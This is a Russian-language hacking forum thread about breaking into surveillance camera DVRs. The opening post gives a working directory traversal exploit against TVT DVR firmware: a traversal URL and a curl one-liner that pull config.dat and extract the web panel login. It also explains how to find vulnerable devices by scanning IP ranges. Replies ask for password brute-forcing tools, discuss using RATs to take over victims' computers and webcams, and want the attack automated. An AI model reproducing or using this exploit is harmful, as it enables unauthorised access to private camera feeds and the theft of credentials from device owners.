Взлом и получение доступа к камерам наблюдения.

[hack-anonim]

Информация Для начала, посмотрим на саму уязвимость, она была виставлена на Exploit-DB с тайтлом «TVT TD-2308SS-B DVR directory traversal», — регистратор на 16 камер + 2 выхода на аудио, на котором стоит прошивка 3.2.0.P-3520A-00, и другие устройства с этой прошивкой. Атакующий может получить доступ к файлам конфигурации, таких как config.dat, где находится инфа для входа в веб интерфейс.
Адрес где лежит конфигурационный файл.

http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat 1

http://[IP ADDRESS]/../../../mnt/mtd/config/config.dat

Парсинг
Именно для меня на данный момент такой способ парсинга самый актуальный. Использую я Advanced IP Scanner Сам сканер.

Выбран диапазон IP. Нас интересует шапка DVR Components Download



Вот такой вид имеет панель входа.


Вот код самого експлойта
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
1
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings

Вот пример


Ну и все в итоге у нас юзер и пасс от панели

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

 

[Shish]

как искать лог-пароль с бек трек не знаю, поясни?

 

[ksid]

Может есть у кого прога подбора пароля для камер?

 

[dolv]

Недавно натыкался на демонстрацию червя , выглядело как обычный бот , но ты мог полностью управлять его компьютером + подключится к вебкамере . Как можно такое провернуть ?

 

[AnGel]

Недавно натыкался на демонстрацию червя , выглядело как обычный бот , но ты мог полностью управлять его компьютером + подключится к вебкамере . Как можно такое провернуть ?

это обычный RAT'ник

 

[Wertver]

Недавно натыкался на демонстрацию червя , выглядело как обычный бот , но ты мог полностью управлять его компьютером + подключится к вебкамере . Как можно такое провернуть ?

Рат,это как пример

 

[grusha2014]

Эля каких камер актуально?

 

[Valentin_Valushkin]

Все круто, вот только автоматизировать бы)))